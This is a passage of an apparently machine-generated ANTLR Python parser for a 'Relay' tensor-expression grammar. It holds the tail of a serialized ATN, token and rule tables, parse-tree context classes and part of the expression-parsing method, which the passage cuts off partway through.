buf.write("\3\7\3\7\3\7\5\7\u00c4\n\7\3\b\3\b\3\b\7\b\u00c9\n\b\f")
buf.write("\b\16\b\u00cc\13\b\5\b\u00ce\n\b\3\t\3\t\3\t\5\t\u00d3")
buf.write("\n\t\3\n\3\n\3\n\7\n\u00d8\n\n\f\n\16\n\u00db\13\n\5\n")
buf.write("\u00dd\n\n\3\13\3\13\3\13\3\13\3\f\3\f\3\f\3\f\3\f\3\f")
buf.write("\7\f\u00e9\n\f\f\f\16\f\u00ec\13\f\3\f\3\f\5\f\u00f0\n")
buf.write("\f\3\r\3\r\3\r\3\r\3\r\3\r\3\r\3\r\3\r\3\r\3\r\6\r\u00fd")
buf.write("\n\r\r\r\16\r\u00fe\3\r\3\r\3\r\3\r\3\r\3\r\3\r\3\r\3")
buf.write("\r\3\r\3\r\3\r\5\r\u010d\n\r\3\r\3\r\3\r\3\r\7\r\u0113")
buf.write("\n\r\f\r\16\r\u0116\13\r\5\r\u0118\n\r\3\r\3\r\3\r\3\r")
buf.write("\3\r\5\r\u011f\n\r\3\16\3\16\3\16\3\16\3\16\3\16\3\16")
buf.write("\3\16\3\16\3\16\3\16\6\16\u012c\n\16\r\16\16\16\u012d")
buf.write("\3\16\3\16\5\16\u0132\n\16\3\17\3\17\3\17\3\17\3\17\5")
buf.write("\17\u0139\n\17\3\20\3\20\3\21\3\21\3\21\3\21\3\22\3\22")
buf.write("\3\22\5\22\u0144\n\22\3\23\3\23\3\23\3\23\5\23\u014a\n")
buf.write("\23\3\23\2\3\6\24\2\4\6\b\n\f\16\20\22\24\26\30\32\34")
buf.write("\36 \"$\2\6\3\2\31\32\3\2\33\34\3\2\35 \3\2!\"\2\u0175")
buf.write("\2&\3\2\2\2\4(\3\2\2\2\6\177\3\2\2\2\b\u00a2\3\2\2\2\n")
buf.write("\u00af\3\2\2\2\f\u00c3\3\2\2\2\16\u00cd\3\2\2\2\20\u00cf")
buf.write("\3\2\2\2\22\u00dc\3\2\2\2\24\u00de\3\2\2\2\26\u00ef\3")
buf.write("\2\2\2\30\u011e\3\2\2\2\32\u0131\3\2\2\2\34\u0138\3\2")
buf.write("\2\2\36\u013a\3\2\2\2 \u013c\3\2\2\2\"\u0143\3\2\2\2$")
buf.write("\u0149\3\2\2\2&\'\7*\2\2\'\3\3\2\2\2(\60\7\25\2\2)+\5")
buf.write("\n\6\2*)\3\2\2\2+.\3\2\2\2,*\3\2\2\2,-\3\2\2\2-\61\3\2")
buf.write("\2\2.,\3\2\2\2/\61\5\6\4\2\60,\3\2\2\2\60/\3\2\2\2\61")
buf.write("\62\3\2\2\2\62\63\7\2\2\3\63\5\3\2\2\2\64\65\b\4\1\2\65")
buf.write("\66\7\3\2\2\66\67\5\6\4\2\678\7\4\2\28\u0080\3\2\2\29")
buf.write(":\7\34\2\2:\u0080\5\6\4\23;\u0080\5\b\5\2<=\7\3\2\2=\u0080")
buf.write("\7\4\2\2>?\7\3\2\2?@\5\6\4\2@A\7\5\2\2AB\7\4\2\2B\u0080")
buf.write("\3\2\2\2CD\7\3\2\2DG\5\6\4\2EF\7\5\2\2FH\5\6\4\2GE\3\2")
buf.write("\2\2HI\3\2\2\2IG\3\2\2\2IJ\3\2\2\2JK\3\2\2\2KL\7\4\2\2")
buf.write("L\u0080\3\2\2\2MV\7\6\2\2NS\5\6\4\2OP\7\5\2\2PR\5\6\4")
buf.write("\2QO\3\2\2\2RU\3\2\2\2SQ\3\2\2\2ST\3\2\2\2TW\3\2\2\2U")
buf.write("S\3\2\2\2VN\3\2\2\2VW\3\2\2\2WX\3\2\2\2X\u0080\7\7\2\2")
buf.write("YZ\7\b\2\2Z[\7\3\2\2[\\\5\6\4\2\\]\7\4\2\2]^\5 \21\2^")
buf.write("_\7\t\2\2_`\5 \21\2`\u0080\3\2\2\2ac\7\n\2\2bd\7&\2\2")
buf.write("cb\3\2\2\2cd\3\2\2\2de\3\2\2\2ef\5\20\t\2fg\7\13\2\2g")
buf.write("h\5\6\4\2hi\7\f\2\2ij\5\6\4\bj\u0080\3\2\2\2km\7\n\2\2")
buf.write("ln\7&\2\2ml\3\2\2\2mn\3\2\2\2no\3\2\2\2op\5\20\t\2pq\7")
buf.write("\13\2\2qr\7\r\2\2rs\5\6\4\2st\7\16\2\2tu\7\f\2\2uv\5\6")
buf.write("\4\7v\u0080\3\2\2\2wx\5$\23\2xy\7\13\2\2yz\5\6\4\2z{\7")
buf.write("\f\2\2{|\5\6\4\5|\u0080\3\2\2\2}\u0080\5$\23\2~\u0080")
buf.write("\5\"\22\2\177\64\3\2\2\2\1779\3\2\2\2\177;\3\2\2\2\177")
buf.write("<\3\2\2\2\177>\3\2\2\2\177C\3\2\2\2\177M\3\2\2\2\177Y")
buf.write("\3\2\2\2\177a\3\2\2\2\177k\3\2\2\2\177w\3\2\2\2\177}\3")
buf.write("\2\2\2\177~\3\2\2\2\u0080\u009f\3\2\2\2\u0081\u0082\f")
buf.write("\22\2\2\u0082\u0083\t\2\2\2\u0083\u009e\5\6\4\23\u0084")
buf.write("\u0085\f\21\2\2\u0085\u0086\t\3\2\2\u0086\u009e\5\6\4")
buf.write("\22\u0087\u0088\f\20\2\2\u0088\u0089\t\4\2\2\u0089\u009e")
buf.write("\5\6\4\21\u008a\u008b\f\17\2\2\u008b\u008c\t\5\2\2\u008c")
buf.write("\u009e\5\6\4\20\u008d\u008e\f\6\2\2\u008e\u008f\7\f\2")
buf.write("\2\u008f\u009e\5\6\4\7\u0090\u0091\f\24\2\2\u0091\u009a")
buf.write("\7\3\2\2\u0092\u0097\5\6\4\2\u0093\u0094\7\5\2\2\u0094")
buf.write("\u0096\5\6\4\2\u0095\u0093\3\2\2\2\u0096\u0099\3\2\2\2")
buf.write("\u0097\u0095\3\2\2\2\u0097\u0098\3\2\2\2\u0098\u009b\3")
buf.write("\2\2\2\u0099\u0097\3\2\2\2\u009a\u0092\3\2\2\2\u009a\u009b")
buf.write("\3\2\2\2\u009b\u009c\3\2\2\2\u009c\u009e\7\4\2\2\u009d")
buf.write("\u0081\3\2\2\2\u009d\u0084\3\2\2\2\u009d\u0087\3\2\2\2")
buf.write("\u009d\u008a\3\2\2\2\u009d\u008d\3\2\2\2\u009d\u0090\3")
buf.write("\2\2\2\u009e\u00a1\3\2\2\2\u009f\u009d\3\2\2\2\u009f\u00a0")
buf.write("\3\2\2\2\u00a0\7\3\2\2\2\u00a1\u009f\3\2\2\2\u00a2\u00a4")
buf.write("\7\17\2\2\u00a3\u00a5\5\26\f\2\u00a4\u00a3\3\2\2\2\u00a4")
buf.write("\u00a5\3\2\2\2\u00a5\u00a6\3\2\2\2\u00a6\u00a7\7\3\2\2")
buf.write("\u00a7\u00a8\5\f\7\2\u00a8\u00ab\7\4\2\2\u00a9\u00aa\7")
buf.write("\20\2\2\u00aa\u00ac\5\30\r\2\u00ab\u00a9\3\2\2\2\u00ab")
buf.write("\u00ac\3\2\2\2\u00ac\u00ad\3\2\2\2\u00ad\u00ae\5 \21\2")
buf.write("\u00ae\t\3\2\2\2\u00af\u00b0\7\21\2\2\u00b0\u00b2\5$\23")
buf.write("\2\u00b1\u00b3\5\26\f\2\u00b2\u00b1\3\2\2\2\u00b2\u00b3")
buf.write("\3\2\2\2\u00b3\u00b4\3\2\2\2\u00b4\u00b5\7\3\2\2\u00b5")
buf.write("\u00b6\5\f\7\2\u00b6\u00b9\7\4\2\2\u00b7\u00b8\7\20\2")
buf.write("\2\u00b8\u00ba\5\30\r\2\u00b9\u00b7\3\2\2\2\u00b9\u00ba")
buf.write("\3\2\2\2\u00ba\u00bb\3\2\2\2\u00bb\u00bc\5 \21\2\u00bc")
buf.write("\13\3\2\2\2\u00bd\u00c4\5\16\b\2\u00be\u00c4\5\22\n\2")
buf.write("\u00bf\u00c0\5\16\b\2\u00c0\u00c1\7\5\2\2\u00c1\u00c2")
buf.write("\5\22\n\2\u00c2\u00c4\3\2\2\2\u00c3\u00bd\3\2\2\2\u00c3")
buf.write("\u00be\3\2\2\2\u00c3\u00bf\3\2\2\2\u00c4\r\3\2\2\2\u00c5")
buf.write("\u00ca\5\20\t\2\u00c6\u00c7\7\5\2\2\u00c7\u00c9\5\20\t")
buf.write("\2\u00c8\u00c6\3\2\2\2\u00c9\u00cc\3\2\2\2\u00ca\u00c8")
buf.write("\3\2\2\2\u00ca\u00cb\3\2\2\2\u00cb\u00ce\3\2\2\2\u00cc")
buf.write("\u00ca\3\2\2\2\u00cd\u00c5\3\2\2\2\u00cd\u00ce\3\2\2\2")
buf.write("\u00ce\17\3\2\2\2\u00cf\u00d2\5$\23\2\u00d0\u00d1\7\22")
buf.write("\2\2\u00d1\u00d3\5\30\r\2\u00d2\u00d0\3\2\2\2\u00d2\u00d3")
buf.write("\3\2\2\2\u00d3\21\3\2\2\2\u00d4\u00d9\5\24\13\2\u00d5")
buf.write("\u00d6\7\5\2\2\u00d6\u00d8\5\24\13\2\u00d7\u00d5\3\2\2")
buf.write("\2\u00d8\u00db\3\2\2\2\u00d9\u00d7\3\2\2\2\u00d9\u00da")
buf.write("\3\2\2\2\u00da\u00dd\3\2\2\2\u00db\u00d9\3\2\2\2\u00dc")
buf.write("\u00d4\3\2\2\2\u00dc\u00dd\3\2\2\2\u00dd\23\3\2\2\2\u00de")
buf.write("\u00df\7*\2\2\u00df\u00e0\7\13\2\2\u00e0\u00e1\5\6\4\2")
buf.write("\u00e1\25\3\2\2\2\u00e2\u00e3\7\6\2\2\u00e3\u00f0\7\7")
buf.write("\2\2\u00e4\u00e5\7\6\2\2\u00e5\u00ea\5$\23\2\u00e6\u00e7")
buf.write("\7\5\2\2\u00e7\u00e9\5$\23\2\u00e8\u00e6\3\2\2\2\u00e9")
buf.write("\u00ec\3\2\2\2\u00ea\u00e8\3\2\2\2\u00ea\u00eb\3\2\2\2")
buf.write("\u00eb\u00ed\3\2\2\2\u00ec\u00ea\3\2\2\2\u00ed\u00ee\7")
buf.write("\7\2\2\u00ee\u00f0\3\2\2\2\u00ef\u00e2\3\2\2\2\u00ef\u00e4")
buf.write("\3\2\2\2\u00f0\27\3\2\2\2\u00f1\u00f2\7\3\2\2\u00f2\u011f")
buf.write("\7\4\2\2\u00f3\u00f4\7\3\2\2\u00f4\u00f5\5\30\r\2\u00f5")
buf.write("\u00f6\7\5\2\2\u00f6\u00f7\7\4\2\2\u00f7\u011f\3\2\2\2")
buf.write("\u00f8\u00f9\7\3\2\2\u00f9\u00fc\5\30\r\2\u00fa\u00fb")
buf.write("\7\5\2\2\u00fb\u00fd\5\30\r\2\u00fc\u00fa\3\2\2\2\u00fd")
buf.write("\u00fe\3\2\2\2\u00fe\u00fc\3\2\2\2\u00fe\u00ff\3\2\2\2")
buf.write("\u00ff\u0100\3\2\2\2\u0100\u0101\7\4\2\2\u0101\u011f\3")
buf.write("\2\2\2\u0102\u011f\5\36\20\2\u0103\u0104\7\23\2\2\u0104")
buf.write("\u0105\7\6\2\2\u0105\u0106\5\32\16\2\u0106\u0107\7\5\2")
buf.write("\2\u0107\u0108\5\30\r\2\u0108\u0109\7\7\2\2\u0109\u011f")
buf.write("\3\2\2\2\u010a\u010c\7\17\2\2\u010b\u010d\5\26\f\2\u010c")
buf.write("\u010b\3\2\2\2\u010c\u010d\3\2\2\2\u010d\u010e\3\2\2\2")
buf.write("\u010e\u0117\7\3\2\2\u010f\u0114\5\30\r\2\u0110\u0111")
buf.write("\7\5\2\2\u0111\u0113\5\30\r\2\u0112\u0110\3\2\2\2\u0113")
buf.write("\u0116\3\2\2\2\u0114\u0112\3\2\2\2\u0114\u0115\3\2\2\2")
buf.write("\u0115\u0118\3\2\2\2\u0116\u0114\3\2\2\2\u0117\u010f\3")
buf.write("\2\2\2\u0117\u0118\3\2\2\2\u0118\u0119\3\2\2\2\u0119\u011a")
buf.write("\7\4\2\2\u011a\u011b\7\20\2\2\u011b\u011f\5\30\r\2\u011c")
buf.write("\u011f\7\24\2\2\u011d\u011f\7)\2\2\u011e\u00f1\3\2\2\2")
buf.write("\u011e\u00f3\3\2\2\2\u011e\u00f8\3\2\2\2\u011e\u0102\3")
buf.write("\2\2\2\u011e\u0103\3\2\2\2\u011e\u010a\3\2\2\2\u011e\u011c")
buf.write("\3\2\2\2\u011e\u011d\3\2\2\2\u011f\31\3\2\2\2\u0120\u0121")
buf.write("\7\3\2\2\u0121\u0132\7\4\2\2\u0122\u0123\7\3\2\2\u0123")
buf.write("\u0124\5\34\17\2\u0124\u0125\7\5\2\2\u0125\u0126\7\4\2")
buf.write("\2\u0126\u0132\3\2\2\2\u0127\u0128\7\3\2\2\u0128\u012b")
buf.write("\5\34\17\2\u0129\u012a\7\5\2\2\u012a\u012c\5\34\17\2\u012b")
buf.write("\u0129\3\2\2\2\u012c\u012d\3\2\2\2\u012d\u012b\3\2\2\2")
buf.write("\u012d\u012e\3\2\2\2\u012e\u012f\3\2\2\2\u012f\u0130\7")
buf.write("\4\2\2\u0130\u0132\3\2\2\2\u0131\u0120\3\2\2\2\u0131\u0122")
buf.write("\3\2\2\2\u0131\u0127\3\2\2\2\u0132\33\3\2\2\2\u0133\u0134")
buf.write("\7\3\2\2\u0134\u0135\5\34\17\2\u0135\u0136\7\4\2\2\u0136")
buf.write("\u0139\3\2\2\2\u0137\u0139\7)\2\2\u0138\u0133\3\2\2\2")
buf.write("\u0138\u0137\3\2\2\2\u0139\35\3\2\2\2\u013a\u013b\7*\2")
buf.write("\2\u013b\37\3\2\2\2\u013c\u013d\7\r\2\2\u013d\u013e\5")
buf.write("\6\4\2\u013e\u013f\7\16\2\2\u013f!\3\2\2\2\u0140\u0144")
buf.write("\7(\2\2\u0141\u0144\7)\2\2\u0142\u0144\7\'\2\2\u0143\u0140")
buf.write("\3\2\2\2\u0143\u0141\3\2\2\2\u0143\u0142\3\2\2\2\u0144")
buf.write("#\3\2\2\2\u0145\u014a\5\2\2\2\u0146\u014a\7#\2\2\u0147")
buf.write("\u014a\7$\2\2\u0148\u014a\7%\2\2\u0149\u0145\3\2\2\2\u0149")
buf.write("\u0146\3\2\2\2\u0149\u0147\3\2\2\2\u0149\u0148\3\2\2\2")
buf.write("\u014a%\3\2\2\2$,\60ISVcm\177\u0097\u009a\u009d\u009f")
buf.write("\u00a4\u00ab\u00b2\u00b9\u00c3\u00ca\u00cd\u00d2\u00d9")
buf.write("\u00dc\u00ea\u00ef\u00fe\u010c\u0114\u0117\u011e\u012d")
buf.write("\u0131\u0138\u0143\u0149")
return buf.getvalue()
class RelayParser ( Parser ):
grammarFileName = "Relay.g4"
atn = ATNDeserializer().deserialize(serializedATN())
decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]
sharedContextCache = PredictionContextCache()
literalNames = [ "<INVALID>", "'('", "')'", "','", "'['", "']'", "'if'",
"'else'", "'let'", "'='", "';'", "'{'", "'}'", "'fn'",
"'->'", "'def'", "':'", "'Tensor'", "'_'", "'v0.0.3'",
"<INVALID>", "<INVALID>", "<INVALID>", "'*'", "'/'",
"'+'", "'-'", "'<'", "'>'", "'<='", "'>='", "'=='",
"'!='", "<INVALID>", "<INVALID>", "<INVALID>", "'mut'" ]
symbolicNames = [ "<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "SEMVER", "WS",
"LINE_COMMENT", "COMMENT", "MUL", "DIV", "ADD", "SUB",
"LT", "GT", "LE", "GE", "EQ", "NE", "GLOBAL_VAR",
"LOCAL_VAR", "GRAPH_VAR", "MUT", "BOOL_LIT", "FLOAT",
"NAT", "CNAME" ]
RULE_opIdent = 0
RULE_prog = 1
RULE_expr = 2
RULE_func = 3
RULE_defn = 4
RULE_argList = 5
RULE_varList = 6
RULE_var = 7
RULE_attrList = 8
RULE_attr = 9
RULE_typeParamSeq = 10
RULE_type_ = 11
RULE_shapeSeq = 12
RULE_shape = 13
RULE_typeIdent = 14
RULE_body = 15
RULE_scalar = 16
RULE_ident = 17
ruleNames = [ "opIdent", "prog", "expr", "func", "defn", "argList",
"varList", "var", "attrList", "attr", "typeParamSeq",
"type_", "shapeSeq", "shape", "typeIdent", "body", "scalar",
"ident" ]
EOF = Token.EOF
T__0=1
T__1=2
T__2=3
T__3=4
T__4=5
T__5=6
T__6=7
T__7=8
T__8=9
T__9=10
T__10=11
T__11=12
T__12=13
T__13=14
T__14=15
T__15=16
T__16=17
T__17=18
SEMVER=19
WS=20
LINE_COMMENT=21
COMMENT=22
MUL=23
DIV=24
ADD=25
SUB=26
LT=27
GT=28
LE=29
GE=30
EQ=31
NE=32
GLOBAL_VAR=33
LOCAL_VAR=34
GRAPH_VAR=35
MUT=36
BOOL_LIT=37
FLOAT=38
NAT=39
CNAME=40
def __init__(self, input:TokenStream, output:TextIO = sys.stdout):
super().__init__(input, output)
self.checkVersion("4.7.1")
self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)
self._predicates = None
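    # A minimal usage sketch (the RelayLexer import path is an assumption;
    # the lexer is generated alongside this parser from the same grammar):
    #
    #   from antlr4 import InputStream, CommonTokenStream
    #   from RelayLexer import RelayLexer
    #   tokens = CommonTokenStream(RelayLexer(InputStream('v0.0.3 ()')))
    #   tree = RelayParser(tokens).prog()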
class OpIdentContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def CNAME(self):
return self.getToken(RelayParser.CNAME, 0)
def getRuleIndex(self):
return RelayParser.RULE_opIdent
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitOpIdent" ):
return visitor.visitOpIdent(self)
else:
return visitor.visitChildren(self)
def opIdent(self):
localctx = RelayParser.OpIdentContext(self, self._ctx, self.state)
self.enterRule(localctx, 0, self.RULE_opIdent)
try:
self.enterOuterAlt(localctx, 1)
self.state = 36
self.match(RelayParser.CNAME)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ProgContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def SEMVER(self):
return self.getToken(RelayParser.SEMVER, 0)
def EOF(self):
return self.getToken(RelayParser.EOF, 0)
def expr(self):
return self.getTypedRuleContext(RelayParser.ExprContext,0)
def defn(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(RelayParser.DefnContext)
else:
return self.getTypedRuleContext(RelayParser.DefnContext,i)
def getRuleIndex(self):
return RelayParser.RULE_prog
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitProg" ):
return visitor.visitProg(self)
else:
return visitor.visitChildren(self)
def prog(self):
localctx = RelayParser.ProgContext(self, self._ctx, self.state)
self.enterRule(localctx, 2, self.RULE_prog)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 38
self.match(RelayParser.SEMVER)
self.state = 46
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [RelayParser.EOF, RelayParser.T__14]:
self.state = 42
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==RelayParser.T__14:
self.state = 39
self.defn()
self.state = 44
self._errHandler.sync(self)
_la = self._input.LA(1)
pass
elif token in [RelayParser.T__0, RelayParser.T__3, RelayParser.T__5, RelayParser.T__7, RelayParser.T__12, RelayParser.SUB, RelayParser.GLOBAL_VAR, RelayParser.LOCAL_VAR, RelayParser.GRAPH_VAR, RelayParser.BOOL_LIT, RelayParser.FLOAT, RelayParser.NAT, RelayParser.CNAME]:
self.state = 45
self.expr(0)
pass
else:
raise NoViableAltException(self)
self.state = 48
self.match(RelayParser.EOF)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ExprContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return RelayParser.RULE_expr
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class IdentExprContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def ident(self):
return self.getTypedRuleContext(RelayParser.IdentContext,0)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitIdentExpr" ):
return visitor.visitIdentExpr(self)
else:
return visitor.visitChildren(self)
class CallContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def expr(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(RelayParser.ExprContext)
else:
return self.getTypedRuleContext(RelayParser.ExprContext,i)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitCall" ):
return visitor.visitCall(self)
else:
return visitor.visitChildren(self)
class NegContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def expr(self):
return self.getTypedRuleContext(RelayParser.ExprContext,0)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitNeg" ):
return visitor.visitNeg(self)
else:
return visitor.visitChildren(self)
class TupleContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def expr(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(RelayParser.ExprContext)
else:
return self.getTypedRuleContext(RelayParser.ExprContext,i)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitTuple" ):
return visitor.visitTuple(self)
else:
return visitor.visitChildren(self)
class ParensContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def expr(self):
return self.getTypedRuleContext(RelayParser.ExprContext,0)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitParens" ):
return visitor.visitParens(self)
else:
return visitor.visitChildren(self)
class FuncExprContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def func(self):
return self.getTypedRuleContext(RelayParser.FuncContext,0)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitFuncExpr" ):
return visitor.visitFuncExpr(self)
else:
return visitor.visitChildren(self)
class ScalarExprContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def scalar(self):
return self.getTypedRuleContext(RelayParser.ScalarContext,0)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitScalarExpr" ):
return visitor.visitScalarExpr(self)
else:
return visitor.visitChildren(self)
class LetContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def var(self):
return self.getTypedRuleContext(RelayParser.VarContext,0)
def expr(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(RelayParser.ExprContext)
else:
return self.getTypedRuleContext(RelayParser.ExprContext,i)
def MUT(self):
return self.getToken(RelayParser.MUT, 0)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitLet" ):
return visitor.visitLet(self)
else:
return visitor.visitChildren(self)
class TensorContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def expr(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(RelayParser.ExprContext)
else:
return self.getTypedRuleContext(RelayParser.ExprContext,i)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitTensor" ):
return visitor.visitTensor(self)
else:
return visitor.visitChildren(self)
class IfElseContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def expr(self):
return self.getTypedRuleContext(RelayParser.ExprContext,0)
def body(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(RelayParser.BodyContext)
else:
return self.getTypedRuleContext(RelayParser.BodyContext,i)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitIfElse" ):
return visitor.visitIfElse(self)
else:
return visitor.visitChildren(self)
class GraphContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def ident(self):
return self.getTypedRuleContext(RelayParser.IdentContext,0)
def expr(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(RelayParser.ExprContext)
else:
return self.getTypedRuleContext(RelayParser.ExprContext,i)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitGraph" ):
return visitor.visitGraph(self)
else:
return visitor.visitChildren(self)
class BinOpContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ExprContext
super().__init__(parser)
self.op = None # Token
self.copyFrom(ctx)
def expr(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(RelayParser.ExprContext)
else:
return self.getTypedRuleContext(RelayParser.ExprContext,i)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitBinOp" ):
return visitor.visitBinOp(self)
else:
return visitor.visitChildren(self)
def expr(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = RelayParser.ExprContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 4
self.enterRecursionRule(localctx, 4, self.RULE_expr, _p)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 125
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,7,self._ctx)
if la_ == 1:
localctx = RelayParser.ParensContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 51
self.match(RelayParser.T__0)
self.state = 52
self.expr(0)
self.state = 53
self.match(RelayParser.T__1)
pass
elif la_ == 2:
localctx = RelayParser.NegContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 55
self.match(RelayParser.SUB)
self.state = 56
self.expr(17)
pass
elif la_ == 3:
localctx = RelayParser.FuncExprContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 57
self.func()
pass
elif la_ == 4:
localctx = RelayParser.TupleContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 58
self.match(RelayParser.T__0)
self.state = 59
self.match(RelayParser.T__1)
pass
elif la_ == 5:
localctx = RelayParser.TupleContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 60
self.match(RelayParser.T__0)
self.state = 61
self.expr(0)
self.state = 62
self.match(RelayParser.T__2)
self.state = 63
self.match(RelayParser.T__1)
pass
elif la_ == 6:
localctx = RelayParser.TupleContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 65
self.match(RelayParser.T__0)
self.state = 66
self.expr(0)
self.state = 69
self._errHandler.sync(self)
_la = self._input.LA(1)
while True:
self.state = 67
self.match(RelayParser.T__2)
self.state = 68
self.expr(0)
self.state = 71
self._errHandler.sync(self)
_la = self._input.LA(1)
if not (_la==RelayParser.T__2):
break
self.state = 73
self.match(RelayParser.T__1)
pass
elif la_ == 7:
localctx = RelayParser.TensorContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 75
self.match(RelayParser.T__3)
self.state = 84
self._errHandler.sync(self)
_la = self._input.LA(1)
if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << RelayParser.T__0) | (1 << RelayParser.T__3) | (1 << RelayParser.T__5) | (1 << RelayParser.T__7) | (1 << RelayParser.T__12) | (1 << RelayParser.SUB) | (1 << RelayParser.GLOBAL_VAR) | (1 << RelayParser.LOCAL_VAR) | (1 << RelayParser.GRAPH_VAR) | (1 << RelayParser.BOOL_LIT) | (1 << RelayParser.FLOAT) | (1 << RelayParser.NAT) | (1 << RelayParser.CNAME))) != 0):
self.state = 76
self.expr(0)
self.state = 81
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==RelayParser.T__2:
self.state = 77
self.match(RelayParser.T__2)
self.state = 78
self.expr(0)
self.state = 83
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 86
self.match(RelayParser.T__4)
pass
elif la_ == 8:
localctx = RelayParser.IfElseContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 87
self.match(RelayParser.T__5)
self.state = 88
self.match(RelayParser.T__0)
self.state = 89
self.expr(0)
self.state = 90
self.match(RelayParser.T__1)
self.state = 91
self.body()
self.state = 92
self.match(RelayParser.T__6)
self.state = 93
self.body()
pass
elif la_ == 9:
localctx = RelayParser.LetContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 95
self.match(RelayParser.T__7)
self.state = 97
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==RelayParser.MUT:
self.state = 96
self.match(RelayParser.MUT)
self.state = 99
self.var()
self.state = 100
self.match(RelayParser.T__8)
self.state = 101
self.expr(0)
self.state = 102
self.match(RelayParser.T__9)
self.state = 103
self.expr(6)
pass
elif la_ == 10:
localctx = RelayParser.LetContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 105
self.match(RelayParser.T__7)
self.state = 107
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==RelayParser.MUT:
self.state = 106
self.match(RelayParser.MUT)
self.state = 109
self.var()
self.state = 110
self.match(RelayParser.T__8)
self.state = 111
self.match(RelayParser.T__10)
self.state = 112
